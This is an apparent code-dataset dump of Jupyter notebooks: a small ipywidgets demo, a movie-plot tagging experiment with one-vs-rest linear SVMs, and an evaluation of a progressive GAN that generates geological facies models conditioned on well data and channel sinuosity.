] | null | null | null | .ipynb_checkpoints/w_1-checkpoint.ipynb | lucaspecina/lucaspecina.github.io | e9b9a02e1e0c4557e7e1585155006a73c2241b4c | [
"MIT"
] | null | null | null | .ipynb_checkpoints/w_1-checkpoint.ipynb | lucaspecina/lucaspecina.github.io | e9b9a02e1e0c4557e7e1585155006a73c2241b4c | [
"MIT"
] | null | null | null | 21.298507 | 120 | 0.544499 | [
[
[
"from ipywidgets import interact\nimport numpy as np \nimport pandas as pd\nimport matplotlib.pyplot as plt\nimport plotly.express as px\nimport seaborn as sns",
"/Users/lucaspecina/anaconda3/lib/python3.7/site-packages/statsmodels/tools/_testing.py:19: FutureWarning:\n\npandas.util.testing is deprecated. Use the functions in the public API at pandas.testing instead.\n\n"
],
[
"def square(x):\n return x * x",
"_____no_output_____"
],
[
"interact(square, x=10);",
"_____no_output_____"
]
]
] | [
"code"
] | [
[
"code",
"code",
"code"
]
] |
cb03fb376d43d144ba17c723a9c84a9459497457 | 8,383 | ipynb | Jupyter Notebook | social-tags/notebooks/movielens-imdb/ovr-svm.ipynb | queirozfcom/auto-tagger | d9c0339648562ceca2d7cd10a02aaf56d353ae7b | [
"MIT"
] | null | null | null | social-tags/notebooks/movielens-imdb/ovr-svm.ipynb | queirozfcom/auto-tagger | d9c0339648562ceca2d7cd10a02aaf56d353ae7b | [
"MIT"
] | 1 | 2016-02-19T03:08:47.000Z | 2016-02-19T03:08:47.000Z | social-tags/notebooks/movielens-imdb/ovr-svm.ipynb | queirozfcom/auto-tagger | d9c0339648562ceca2d7cd10a02aaf56d353ae7b | [
"MIT"
] | null | null | null | 25.793846 | 132 | 0.559227 | [
[
[
"## ovr-svm",
"_____no_output_____"
]
],
[
[
"import pandas as pd\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport gc\nimport nltk\nimport os\nimport re\nimport pickle\nimport sklearn\nimport sys\nimport string\n\nfrom sklearn.metrics import f1_score, precision_score, recall_score,average_precision_score\nfrom sklearn.model_selection import cross_val_score, GridSearchCV,ParameterGrid, train_test_split\nfrom sklearn.multiclass import OneVsRestClassifier\nfrom sklearn.preprocessing import MultiLabelBinarizer, StandardScaler,MinMaxScaler\nfrom sklearn.feature_extraction.text import CountVectorizer\nfrom sklearn.feature_extraction.text import TfidfTransformer,TfidfVectorizer\nfrom sklearn.svm import SVC\nfrom sklearn.pipeline import Pipeline\nfrom sklearn.svm import LinearSVC\n\nfrom tqdm import *\n\n%matplotlib inline\n%load_ext autoreload\n%autoreload 1",
"_____no_output_____"
],
[
"src_dir = os.path.join(os.getcwd(), os.pardir, '../src')\nsys.path.append(src_dir)",
"_____no_output_____"
],
[
"%aimport data.movielens_20m_imdb\n%aimport helpers.labels,helpers.neighbours, helpers.segments\n%aimport utils.dataframes, utils.clusters",
"_____no_output_____"
],
[
"from data.movielens_20m_imdb import load_df_or_get_from_cache\nfrom helpers.labels import truncate_labels,filter_tag\nfrom helpers.neighbours import get_predicted_labels_from_neighbours\nfrom helpers.segments import make_distance_matrix_for_segments,vectorize_segments\n\nfrom utils.dataframes import sample_rows",
"_____no_output_____"
],
[
"filter_tag(\"the king of the mor_ons-- das\")",
"_____no_output_____"
],
[
"INTERIM_DATA_ROOT = os.path.abspath(\"../../data/interim/movielens-ml20m-imdb/\")\nML_ROOT = \"/media/felipe/SAMSUNG/movielens/ml-20m/\"\nIMDB_ROOT = \"/media/felipe/SAMSUNG/imdb/\"\n\nPATH_TO_MOVIES = ML_ROOT + \"/movies.csv\"\nPATH_TO_TAG_ASSIGNMENTS = ML_ROOT + \"/tags.csv\"\nPATH_TO_MOVIE_PLOTS = IMDB_ROOT+\"/plot.list\"\n\n# CONFIGS\n\nMAX_NB_WORDS = 20000\nMIN_LABEL_DF = int(20)\n\n# for sampling\nNB_DOCS = 1500",
"_____no_output_____"
],
[
"docs_df = load_or_get_from_cache(PATH_TO_MOVIES,PATH_TO_TAG_ASSIGNMENTS,PATH_TO_MOVIE_PLOTS,INTERIM_DATA_ROOT)",
"_____no_output_____"
],
[
"# remove this for production\ndocs_df = sample_rows(docs_df,NB_DOCS)",
"_____no_output_____"
],
[
"docs_df.head()",
"_____no_output_____"
],
[
"docs_df.describe()",
"_____no_output_____"
],
[
"truncated_labels = truncate_labels(docs_df[\"unique_tags\"].map(lambda tagstring: tagstring.split(\",\")).values,MIN_LABEL_DF)",
"_____no_output_____"
],
[
"truncated_labels",
"_____no_output_____"
],
[
"mlb = MultiLabelBinarizer()\nbinary_labels = mlb.fit_transform(truncated_labels)\nprint(\"total number of unique tags: {} \".format(len(mlb.classes_)))\n\ndata = docs_df['plot'].values\nindices = np.arange(len(data))\nnp.random.shuffle(indices)\n\ndata = [data[i] for i in indices]\ntargets = binary_labels[indices]\nnum_validation_samples = int(0.15 * len(data))\n\nX_train = data[:-num_validation_samples]\nY_train = targets[:-num_validation_samples]\nX_val = data[-num_validation_samples:]\nY_val = targets[-num_validation_samples:]\n\nprint('total number of train documents: {}'.format(len(X_train)))\nprint('total number of validation documents: {}'.format(len(X_val)))",
"_____no_output_____"
],
[
"# good order (OVR just for the SVM, of course!)\npipeline = Pipeline([\n ('vect', CountVectorizer(max_features=MAX_NB_WORDS)),\n ('tfidf', TfidfTransformer()),\n ('clf', OneVsRestClassifier(LinearSVC(),n_jobs=-1)),\n])\n\nparameters = [\n { \n \"clf__estimator__penalty\": [\"l2\"],\n \"clf__estimator__dual\":[False,True],\n \"clf__estimator__multi_class\":[\"crammer_singer\",\"ovr\"],\n \"clf__estimator__tol\": [0.001,0.0001],\n \"vect__max_features\": [MAX_NB_WORDS] \n },\n { \n \"clf__estimator__penalty\": [\"l1\"],\n \"clf__estimator__dual\":[False],\n \"clf__estimator__multi_class\":[\"crammer_singer\",\"ovr\"],\n \"clf__estimator__tol\": [0.001,0.0001],\n \"vect__max_features\": [MAX_NB_WORDS] \n } \n]",
"_____no_output_____"
],
[
"best_score = float(\"-inf\")\n\nfor g in ParameterGrid(parameters):\n pipeline.set_params(**g)\n \n pipeline.fit(X_train,Y_train)\n \n Y_pred_train = pipeline.predict(X_train) \n Y_pred_val = pipeline.predict(X_val)\n \n train_score = f1_score(Y_train,Y_pred_train,average='micro')\n val_score = f1_score(Y_val,Y_pred_val,average='micro')\n \n current_score = val_score\n \n print(\"train micro-F1: {}\".format(train_score))\n print(\"val micro-F1: {}\".format(val_score))\n print(\"grid: {}\".format(g))\n print(\"\")\n \n if current_score > best_score:\n best_score = current_score\n best_grid = g",
"_____no_output_____"
],
[
"print(best_score,best_grid)",
"_____no_output_____"
]
]
] | [
"markdown",
"code"
] | [
[
"markdown"
],
[
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code"
]
] |
cb0406bf15bbf5a527e1e0de53daf98f237953a7 | 616,682 | ipynb | Jupyter Notebook | Code/1_conditioning_to_well_facies_alone_or_with_global_features/Analyses_of_Trained_Generator-Sinuosity-WellEnlarg.ipynb | SCRFpublic/GeoModeling_Conditional_ProGAN | fb8df86f555fa19572ba7fd9ae719ede5cd961ff | [
"MIT"
] | 8 | 2020-06-30T02:39:17.000Z | 2022-03-17T07:14:11.000Z | Code/1_conditioning_to_well_facies_alone_or_with_global_features/Analyses_of_Trained_Generator-Sinuosity-WellEnlarg.ipynb | SuihongSong/GeoModeling_Conditional_ProGAN | 1ad99865743e161811d46ac96972885432d575e6 | [
"MIT"
] | null | null | null | Code/1_conditioning_to_well_facies_alone_or_with_global_features/Analyses_of_Trained_Generator-Sinuosity-WellEnlarg.ipynb | SuihongSong/GeoModeling_Conditional_ProGAN | 1ad99865743e161811d46ac96972885432d575e6 | [
"MIT"
] | 6 | 2020-08-29T01:04:41.000Z | 2022-01-04T06:04:30.000Z | 559.095195 | 302,224 | 0.933395 | [
[
[
"import sys\nimport pickle\nimport numpy as np\nimport tensorflow as tf\nimport PIL.Image\n%matplotlib inline\nimport matplotlib.pyplot as plt",
"_____no_output_____"
]
],
[
[
"##### Set the path to directory containing code of this case",
"_____no_output_____"
]
],
[
[
"new_path = r'/home/users/suihong/3-Cond_wellfacies-upload/'\nsys.path.append(new_path)",
"_____no_output_____"
]
],
[
[
"#### Set the path to data directory; this directory includes two datasets: \"trainingdata\" and \"testdata\"",
"_____no_output_____"
]
],
[
[
"data_dir_test = '/scratch/users/suihong/DataSets(MultiChannels_Version4_Consistency)/'",
"_____no_output_____"
]
],
[
[
"#### Set path to trained network",
"_____no_output_____"
]
],
[
[
"# 19200 means totally 19200 thousand training images (facies models) used for the training\nnetwork_dir = '/scratch/users/suihong/ProGAN_MultiChannel_Reusults_ConditionedtoMultiConditions_TF/099-pgan-cond-Well-sinuosity-2gpu/'\nnetwork_name = 'network-snapshot-025920.pkl'",
"_____no_output_____"
]
],
[
[
"### 1. Fetch dataset",
"_____no_output_____"
]
],
[
[
"# Initialize TensorFlow session.\ntf.InteractiveSession()\n\nimport dataset\n# tfrecord_dir='TestData' to fetch test dataset, if tfrecord_dir='TrainingData' to fetch training dataset\n# labeltypes: 0 for 'channelorientation', 1 for 'mudproportion', 2 for 'channelwidth', 3 for 'channelsinuosity'\n# well_enlarge: if True, well points occupy 4x4 area, otherwise occupy 1x1 area\ntest_set = dataset.load_dataset(data_dir=data_dir_test, verbose=True, tfrecord_dir='TestData', labeltypes = [1,2,3], well_enlarge = True, shuffle_mb = 0, prefetch_mb = 0)\n\n# labels are from -1 to 1\nimage_test, label_test = test_set.get_minibatch_imageandlabel_np(3000) \nprobimg_test, wellfacies_test = test_set.get_minibatch_probandwell_np(3000*8)\n",
"Streaming data using dataset.TFRecordDataset...\nDataset shape = [1, 64, 64]\nDynamic range = [0, 255]\nLabel size = 4\n"
],
[
"print(image_test.shape)\nprint(label_test.shape)\nprint(probimg_test.shape)\nprint(wellfacies_test.shape)",
"(3000, 1, 64, 64)\n(3000, 4)\n(24000, 1, 64, 64)\n(24000, 1, 64, 64)\n"
],
[
"plt.imshow(wellfacies_test[55,0])",
"_____no_output_____"
],
[
"plt.imshow(image_test[60,0])\nplt.colorbar()",
"_____no_output_____"
]
],
[
[
"#### Global features are kept and inputted into Networks with the scale of -1 to 1. To recover the global features into its original scales, use the below transformation functions.\n",
"_____no_output_____"
]
],
[
[
"# index in label_test[:,0], e.g., \"0\" here, needs to be adjusted according to the setting of \"labeltypes = [3]\" in previous \"dataset.load_dataset(..)\" function\n\n#orit_test = (label_test[:,0]/2+0.5)*168-84\nback_ratio_test = (label_test[:,0]/2+0.5)*0.8037109375+0.167724609375\nwidth_test = (label_test[:,1]/2+0.5)*0.8+2.7\namwv_ratio_test = (label_test[:,2]/2+0.5)*0.4866197183098592+0.06338028169014084",
"_____no_output_____"
]
],
[
[
"### 2. Import pre-trained Network",
"_____no_output_____"
]
],
[
[
"# Initialize TensorFlow session.\ntf.InteractiveSession()\n\n# Import networks.\nwith open(network_dir+network_name, 'rb') as file:\n G, D, Gs = pickle.load(file)",
"/share/software/user/open/py-tensorflow/1.12.0_py36/lib/python3.6/site-packages/tensorflow/python/client/session.py:1702: UserWarning: An interactive session is already active. This can cause out-of-memory errors in some cases. You must explicitly call `InteractiveSession.close()` to release resources held by the other session(s).\n warnings.warn('An interactive session is already active. This can '\n"
]
],
[
[
"\n### 3. Evaluation of the imported pretrained Generator\n",
"_____no_output_____"
],
[
"### 3.1 Fetch 300 inputs from Test dataset",
"_____no_output_____"
]
],
[
[
"# Sample 300 global features, probability maps, and well facies data\nfaciesmodels_real = image_test[:3000]\nlabels_inspect = label_test[:3000]\nproborder = np.arange(3000) * 8 + np.random.RandomState(32).randint(0, 8, size=3000)\n\nwellfacies_inspect_init = wellfacies_test[proborder]\nwellfacies_points_inspect = np.where(wellfacies_inspect_init>0, 1, 0)\nwellfacies_facies_inspect = np.where(wellfacies_inspect_init<1.5, 0, 1)\nwellfacies_inspect = np.concatenate([wellfacies_points_inspect, wellfacies_facies_inspect], 1)",
"_____no_output_____"
],
[
"print(labels_inspect.shape)\nprint(wellfacies_inspect.shape)",
"(3000, 4)\n(3000, 2, 64, 64)\n"
]
],
[
[
"##### Create masks to only output visualize well facies against white background",
"_____no_output_____"
]
],
[
[
"### Enlarge areas of well points for displaying ###\nwellfacies_onechannel = wellfacies_inspect[:,0:1]+wellfacies_inspect[:,1:2]\nwellfacies_onechannel_mask = np.ma.masked_where(wellfacies_onechannel == 0, wellfacies_onechannel)\ncmap_well = plt.cm.viridis # Can be any colormap that you want after the cm '.\ncmap_well.set_bad(color='white')",
"_____no_output_____"
]
],
[
[
"### 3.2 General visual assessment",
"_____no_output_____"
],
[
"#### Visual assessment on realism, diversity, conditioning to global features, conditioning to well facies data",
"_____no_output_____"
],
[
"* (1) Input corresponding global features with well data into trained Generator\n\n Second column corresponds to ground truth for well facies data and global features.",
"_____no_output_____"
]
],
[
[
"print(Gs.input_shapes)",
"[[None, 128], [None, 1], [None, 2, 64, 64]]\n"
],
[
"fig, ax = plt.subplots(8, 16, sharex='col', sharey='row')\nfig.set_size_inches(25, 12.5, forward=True)\n\nimages_plt_average = np.zeros((8,1,64,64))\nfor i in range (8):\n \n ax[i, 0].imshow(wellfacies_onechannel_mask[i,0], cmap=cmap_well, vmax = 2.15)\n ax[i, 1].imshow(faciesmodels_real[i,0,:,:]) # *15+50 is to create inconsistency between labels and probimg\n \n latents_plt = np.random.randn(500, Gs.input_shapes[0][1])\n labels_plt = np.repeat(np.expand_dims(labels_inspect[i,2:3], axis=0), 500, axis=0) ## \n wellfacies_plt = np.repeat(np.expand_dims(wellfacies_inspect[i], axis=0), 500, axis=0)\n \n images_plt = Gs.run(latents_plt, labels_plt, wellfacies_plt)\n images_plt = np.where(images_plt< -0.3, -1, images_plt)\n images_plt = np.where(images_plt> 0.3, 1, images_plt)\n images_plt = np.where((images_plt> -0.4) & (images_plt< 0.4), 0, images_plt)\n\n images_plt_a = (np.where(images_plt> -0.2, 1, images_plt) + 1)/2\n images_plt_average[i] = np.average(images_plt_a, axis = 0)\n\n for j in range(2,15):\n ax[i, j].imshow(images_plt[j-2,0,:,:])\n ax[i, 15].imshow(images_plt_average[i, 0]) \n#plt.savefig(network_dir + \"Random Latents.png\", dpi=200) ",
"_____no_output_____"
]
],
[
[
"### 3.3 Evaluation of Generator's conditioning ability to global features",
"_____no_output_____"
],
[
"#### 3.3.1 Visual assessment by comparing to corresponding ground truth facies models.",
"_____no_output_____"
],
[
"* Generate facies models with increasing input sinuosity index \n",
"_____no_output_____"
],
[
"** Choose appropriate increasing global features from test data. **\n These chosen global features will be used to simulate facies models; these facies models will be compared to ground truth facies models with the same global features in test dataset\n ",
"_____no_output_____"
],
[
"** Choose appropriate increasing global features from test data. **",
"_____no_output_____"
]
],
[
[
"amwv_ratio_no = 4",
"_____no_output_____"
],
[
"amwv_ratio_test_max = np.max(amwv_ratio_test)\namwv_ratio_test_min = np.min(amwv_ratio_test)\nplot_img_no = np.empty((amwv_ratio_no), dtype = np.int)\nfor j in range(amwv_ratio_no):\n for r in range(amwv_ratio_test.shape[0]):\n if amwv_ratio_test[r] >= (amwv_ratio_test_max - amwv_ratio_test_min) * j/amwv_ratio_no+amwv_ratio_test_min and \\\n amwv_ratio_test[r] < (amwv_ratio_test_max - amwv_ratio_test_min) * (j+1)/amwv_ratio_no+amwv_ratio_test_min and \\\n back_ratio_test[r] >= 0.5 and back_ratio_test[r] <0.6:\n plot_img_no[j] = r\n break",
"_____no_output_____"
],
[
"print(plot_img_no)",
"[ 6 2 18 0]\n"
]
],
[
[
"##### Simulate with the above chosen appropriate global features",
"_____no_output_____"
]
],
[
[
"# This cell is only used for evaluation of conditioning to sinuosity when the GAN is only conditioning to sinuosity and well facies data\nfig, ax = plt.subplots(4, 16, sharex='col', sharey='row')\nfig.set_size_inches(24, 6, forward=True)\n\nimages_plt_average = np.zeros((4,1,64,64))\nimages_plt_variance = np.zeros((4,1,64,64))\nfor i in range (4):\n gt_no = plot_img_no[i]\n ax[i, 0].imshow(faciesmodels_real[gt_no,0,:,:]) \n ax[i, 1].imshow(wellfacies_onechannel_mask[gt_no,0], cmap=cmap_well, vmax = 2.15)\n \n latents_plt = np.random.randn(500, Gs.input_shapes[0][1])\n labels_plt = np.repeat(np.expand_dims(labels_inspect[gt_no,3:4], axis=0), 500, axis=0) ## \n wellfacies_plt = np.repeat(np.expand_dims(wellfacies_inspect[gt_no], axis=0), 1 * 500, axis=0)\n \n images_plt = Gs.run(latents_plt, labels_plt, wellfacies_plt)\n images_plt = np.where(images_plt< -0.3, -1, images_plt)\n images_plt = np.where(images_plt> 0.3, 1, images_plt)\n images_plt = np.where((images_plt> -0.4) & (images_plt< 0.4), 0, images_plt)\n\n images_plt_a = np.where(images_plt> -0.3, 1, 0)\n \n images_plt_average[i] = np.average(images_plt_a, axis = 0)\n images_plt_variance[i] = np.var(images_plt_a, axis = 0)\n\n for j in range(2,14):\n ax[i, j].imshow(images_plt[j-2,0,:,:])\n ax[i, 14].imshow(images_plt_average[i, 0], vmin = 0, vmax = 1) \n ax[i, 15].imshow(images_plt_variance[i, 0], vmin = 0, vmax = 0.25)\nplt.savefig(network_dir + \"Condition to sinuosity1.png\", dpi=200) ",
"_____no_output_____"
],
[
"print(plot_img_no)\nprint(amwv_ratio_test[plot_img_no])",
"[ 6 2 18 0]\n[0.07 0.22999999 0.38016528 0.55 ]\n"
]
],
[
[
"#### 3.3.2 Quantitative assessment by comparing to corresponding ground truth facies models.\n#### * Assess channel sinuosity\n#### Second quantitative evaluation method in paper.\n##### 1) With input global features from test dataset, generate a number of facies model realizations;\n##### 2) Use image process toolbox in Matlab to measure the channel sand sinuosity for each generated facies model and the real facies model in test dataset;\n##### 3) Use blox plot to compare the distribution of calculated global features from the generated facies models and the real facies models from test dataset.\n",
"_____no_output_____"
]
],
[
[
"latents_plt = np.random.RandomState(99).randn(300, Gs.input_shapes[0][1])\nlabels_plt = label_test[:300, 3:4]\nwellfacies_plt = wellfacies_inspect[:300]\n\n# Run the generator to produce a set of images.\nimages_plt = Gs.run(latents_plt, labels_plt,wellfacies_plt)\nimages_plt = np.where(images_plt< -0.3, -1, images_plt)\nimages_plt = np.where(images_plt> 0.3, 1, images_plt)\nimages_plt = np.where((images_plt> -0.4) & (images_plt< 0.4), 0, images_plt)",
"_____no_output_____"
],
[
"# Save the generated facies models to measure their global features in Matlab\n\nnp.savetxt(network_dir + 'images_generated.out', np.reshape(images_plt,[-1,64]), delimiter='\\n', fmt='%1.1e') # X is an array\nnp.savetxt(network_dir + 'input_sinuosity.out', amwv_ratio_test[:300], delimiter=',', fmt='%1.4e')",
"_____no_output_____"
],
[
"# Calculate corresponding mud facies proportion, used for falsification\nprops = np.average(np.where(images_plt < -0.5, 1, 0), axis = (1, 2, 3))\nnp.savetxt(network_dir + 'images_generated_variouswelldata.out', props, delimiter='\\n', fmt='%1.4e') \n",
"_____no_output_____"
]
],
[
[
"###### Box plot",
"_____no_output_____"
]
],
[
[
"# statistics of generated facies models with differnt input sinuosity\natodlen1=[1.11889313640155,1.09077787644318,1.12165645035333,1.09007474127227,1.13424798563159,1.13978293428402,1.11589740130591,1.08779763348608,1.10422031446294,1.17915902056786,1.02510382912376,1.17754080734206,1.10875489964738,1.18006034468054,1.27723890880682,1.14638300311517,1.08693130776357,1.1252197699912,1.109755804729,1.16673251350461,1.06846449139615,1.17203190188304,1.16330998283785,1.0672391301468,1.08866531192593,1.12416211546016,1.08876828138484,1.13792798971085,1.08172883034534,1.21580531837135,1.16354479912917,1.08044443747823,1.10654455347437,1.10174692816356,1.15188569360076,1.1405607079217,1.18031308206105,1.18542732746059,1.1232360416386,1.08106615903648,1.03094429058473,1.09190293169268,1.11142403382545,1.16616135904274,1.10355341434478,1.16389655030855,1.16659102541762,1.13192857588692,1.07118203692042,1.1266728660161,1.07459689798195,1.09970672681694,1.10635609001926,1.13221228463309,1.11750625345516,1.14314916661737,1.20083274841309,1.20504213919236,1.18240699508685,1.08712839696534,1.2260388931612,1.12483686658524,1.13391254500886,1.11078855865792,1.1359207331302,1.22642969615047]\natodlen2=[1.23346416627969,1.18790795871182,1.13206343645113,1.15338398825942,1.35522185771154,1.25681517599675,1.25224679547042,1.29612092872378,1.24560397238837,1.1491338876045,1.25456488401029,1.23013928805078,1.19372906892008,1.22265130803079,1.21318294337388,1.28551517544856,1.25217338162324,1.10815673856744,1.14175645721712,1.20245720113621,1.26116454098179,1.23981030791812,1.10862054524809,1.19454408468376,1.26833117593655,1.17526158283443,1.3340651202328,1.20681028667095,1.28884541800114,1.29659761124924,1.17471201367372,1.2623522326848,1.27644874404882,1.27708851822535,1.20310242653192,1.20839972375883,1.2577319236707,1.19332561298605,1.19804239122632,1.27270631353138,1.15814653319549,1.17790658980959,1.28400380876366,1.274688236357,1.40724325130618,1.18431519006312,1.38478713245515,1.33262839242974,1.22182427675395,1.28858043330918,1.2480230728123,1.26572099474012]\natodlen3=[1.42192410908225,1.30050392626452,1.39992573412069,1.37263802405987,1.47959767824524,1.33871582748462,1.55702586171734,1.29703136026025,1.42648817860534,1.54277708166896,1.3413078386406,1.37451623939317,1.33874745766729,1.28142160021022,1.3640579438568,1.3312281783283,1.26124791761409,1.42836951848415,1.42330129463223,1.3824873212986,1.32318867234402,1.34780962028487,1.46170292845754,1.40062567956459,1.34601323608999,1.2991542394207,1.39879432768685,1.35982398566578,1.38103394691446,1.46038873239369,1.3695438754174,1.32504218975231,1.38660499687224,1.52656655308705,1.46086932069164,1.39252518413149,1.32385365329999,1.49312453883924,1.48530704668984,1.38268800710165,1.50227513995371,1.40363340757143,1.43564719222004,1.30066577684531,1.38946521505559,1.35515484785891,1.35373208958743,1.48410146998181,1.55720364978457]\natodlen4=[1.47854052910486,1.44875296985827,1.56205549619363,1.49967116076352,1.5110593576732,1.54660190884447,1.61775808590815,1.63299484355889,1.44380133543288,1.8768958182758,1.51801322831438,1.66702979671336,1.58709698671153,1.51647210762613,1.43256584267425,1.63567708346971,1.67397299546274,1.7805802368729,1.49779277041385,1.7116209119977,1.69743132669584,1.54304168767851,1.50029133424245,1.43418602408524,1.64933702557829,1.68593331031236,1.46346597383482,1.59628920777078,1.4938495366634,1.5193055744107,1.77318391930879,1.51501375015756,1.66865709073917,1.57122626158941,1.38764347641693,1.52438039615829,1.69678134962763,1.47333633645482,1.60123019487691,1.46272626757244,1.63630072740957,2.09612413473267,1.82043738987135,1.76016424252416,1.70838436718918,1.61712018873247,1.52252092436247,1.60551035800042,1.70797328069314,1.61350523799317,1.51520291640211,1.51784056099423,1.50671388504789,1.58125653505074,1.46183724432156,1.75201099012403,1.50460566587645,1.32495784759522,1.63960059500893,1.83595874370741,1.62801633133348,1.31987552398628,1.91973429586026,1.53907450403085,1.33521982648562,1.52347521729374,10.3066484298083,1.4467062138431,1.38666242910265,1.60423843720179,1.53993290339551,1.74443934718012,1.45756769539599,1.55009632415411,1.3521773223474,1.43932014186439,1.46019141523122,1.58652908035827,1.66918275044889,1.6224014047749,1.39148723365835,1.52729178631895,1.89642724630959,1.56554835652658,1.82062181678182,1.4529929845647,1.77689702994759,1.59889335828939,1.61332230786664,2.05694321876533,1.44468123769683,1.49215293366155,1.44791406892582,1.64402865035875,1.54780224110627,1.63894827288451,5.22306304558851,1.53235259488324,1.37752366585505,1.51948863864103,1.70012307970306,1.62365146804077,1.5619331999111,1.64510583463559,1.5848142375346,1.49508528589155,1.42645082603477,1.460990268011,2.01645794711342,1.40852830991425,1.57794744143376,1.25163213782414,1.55399420643523,1.44450010301215,1.47066214824339,1.7198627187404,1.48373251955428,1.57968195253227,1.59452089774149,1.68339687365707,1.51820707428025,1.46864477882538,1.62361567367562]\n",
"_____no_output_____"
],
[
"fig1, ax1 = plt.subplots()\nax1.set_title('Sinuosity assessment of generated facies models')\nax1.boxplot([atodlen1,atodlen2,atodlen3,atodlen4],showfliers=False)\nplt.savefig(network_dir + \"Sinuosity assessment of generated facies models.png\", dpi=200) ",
"_____no_output_____"
]
],
[
[
"### 3.4 Evaluation of Generator's conditioning ability to input well data",
"_____no_output_____"
],
[
"**Well points accuracy evaluation**",
"_____no_output_____"
]
],
[
[
"def get_random_well_facies_data(images_num):\n well_points = np.zeros([images_num, 1, 64, 64], dtype = int)\n for i in range(images_num):\n well_points_num = np.random.RandomState(3*i).choice(np.arange(8, 16), 1) # Random choose the expected total number of well points\n xs = np.random.choice(64, well_points_num)\n ys = np.random.choice(64, well_points_num)\n well_points[i, 0, xs, ys] = 1\n\n # Using test facies models to sample faices types at well points\n well_facies = np.where(well_points * image_test[:images_num]>0, 1, 0)\n well_facies = np.concatenate([well_points, well_facies], 1) \n \n return well_facies",
"_____no_output_____"
],
[
"def generate_images(realization_num, well_facies):\n # Generate latent vectors.\n latents_plt = np.random.randn(realization_num, Gs.input_shapes[0][1]) \n labels_plt = np.random.uniform(-1, 1, (realization_num, Gs.input_shapes[1][1])) \n well_facies_plt = well_facies\n\n # Run the generator to produce a set of images.\n images_plt = Gs.run(latents_plt, labels_plt, well_facies_plt)\n images_plt = np.where(images_plt< -0.3, -1, images_plt)\n images_plt = np.where(images_plt> 0.15, 1, images_plt)\n images_plt = np.where((images_plt>= -0.3) & (images_plt<= 0.15), 0, images_plt)\n return images_plt",
"_____no_output_____"
],
[
"def well_points_accuracy(well_facies, fake_imgs_a):\n gg = well_facies_smp_train_facies[:,0:1] + well_facies_smp_train_facies[:,1:2]\n \n recognized_f1 = np.where((gg==2) & (well_facies_smp_train_facies[:,0:1] * (fake_imgs_a+1) > 0.8), 1, 0)\n f1_prob = np.sum(recognized_f1)/np.sum(np.where(gg==2,1,0))\n\n recognized_f0 = np.where((gg==1) & (well_facies_smp_train_facies[:,0:1] * (fake_imgs_a+2) ==1), 1, 0)\n f0_prob = np.sum(recognized_f0)/np.sum(np.where(gg==1,1,0))\n \n return f1_prob, f0_prob",
"_____no_output_____"
],
[
"def enlarge(well_facies):\n ### Enlarge areas of well points into 4 x 4 as inputs\n with tf.device('/gpu:1'):\n well_facies = tf.cast(well_facies, tf.float32)\n well_facies_enlarge = tf.nn.max_pool(well_facies, ksize = [1,1,4,4], strides=[1,1,1,1], padding='SAME', data_format='NCHW') \n with tf.Session() as sess: \n sess.run(tf.global_variables_initializer())\n well_points_el = sess.run(well_facies_enlarge) \n return well_points_el",
"_____no_output_____"
],
[
"images_num = 1000\nwell_facies_smp_train_facies = get_random_well_facies_data(images_num)\nwell_facies_smp_train_facies_el = enlarge(well_facies_smp_train_facies) \nfake_imgs = generate_images(images_num, well_facies_smp_train_facies_el)\nf_c_prob, f_m_prob = well_points_accuracy(well_facies_smp_train_facies, fake_imgs)\nprint(f_c_prob) # well facies reproduction accuracy for input channel complex facies\nprint(f_m_prob) # well facies reproduction accuracy for input mud facies",
"0.9952981406283394\n0.9785766691122524\n"
]
],
[
[
"### 4. Evaluation of the imported pretrained Discriminator as a global feature recognizer",
"_____no_output_____"
],
[
"#### Assess D with Test data",
"_____no_output_____"
]
],
[
[
"plt_data_no = 500\na = np.arange(plt_data_no)\nnp.random.shuffle(a)\ntest_img_no = a[:plt_data_no]\n_, features = D.run(image_test[test_img_no]/127.5-1)",
"_____no_output_____"
],
[
"# orit_test = (label_test[:,0]/2+0.5)*168-84\n# back_ratio_test = (label_test[:,1]/2+0.5)*0.8037109375+0.167724609375\n# width_test = (label_test[:,2]/2+0.5)*0.8+2.7\n# amwv_ratio_test = (label_test[:,3]/2+0.5)*0.4866197183098592+0.06338028169014084\n\nfeatures[:, 0] = (features[:, 0] /2+0.5)*0.4866197183098592+0.06338028169014084\n\nfig, ax = plt.subplots(1, 1)\nfig.set_size_inches(6, 5, forward=True)\n\n# labels_cor includes: orientation, background_ratio, width, amplitude/wavelength ratio, after shifting to (-1, 1)\nax.scatter(amwv_ratio_test[test_img_no], features[:, 0]) \n# calc the trendline\nz3 = np.polyfit(amwv_ratio_test[test_img_no], features[:, 0], 1)\np3 = np.poly1d(z3)\nax.plot(amwv_ratio_test[test_img_no],p3(amwv_ratio_test[test_img_no]),\"r-\")\n# the line equation:\nprint (\"y=%.6fx+(%.6f)\"%(z3[0],z3[1]))\nax.set_xlabel(\"Amplitude/wavelength ratio inputted to D\")\nax.set_ylabel(\"Predicted amplitude/wavelength ratio by D\")\n#plt.savefig(network_dir +\"Mud facies ratio scatter of fake vs real.png\", dpi=200) \n",
"y=0.830203x+(0.089593)\n"
]
],
[
[
"#### Assess D with Simulated data\n*(1) Randomly Select global features data",
"_____no_output_____"
]
],
[
[
"print(plt_data_no)",
"500\n"
],
[
"# Generate latent vectors.\nlatents_plt = np.random.randn(plt_data_no, Gs.input_shapes[0][1]) # 1000 random latents *Gs.input_shapes[0][1:]=[None, 128] [None, 4]\n\nlabels_plt = labels_inspect[:plt_data_no, 2:3]\n\nwellfacies_plt = wellfacies_inspect[:plt_data_no]\n\n# Run the generator to produce a set of images.\nimages_plt = Gs.run(latents_plt, labels_plt, wellfacies_plt)\nimages_plt = np.where(images_plt< -0.7, -1, images_plt)\nimages_plt = np.where(images_plt> 0.3, 1, images_plt)\n\n_, features = D.run(images_plt)\n",
"_____no_output_____"
],
[
"plt.imshow(images_plt[0,0])",
"_____no_output_____"
],
[
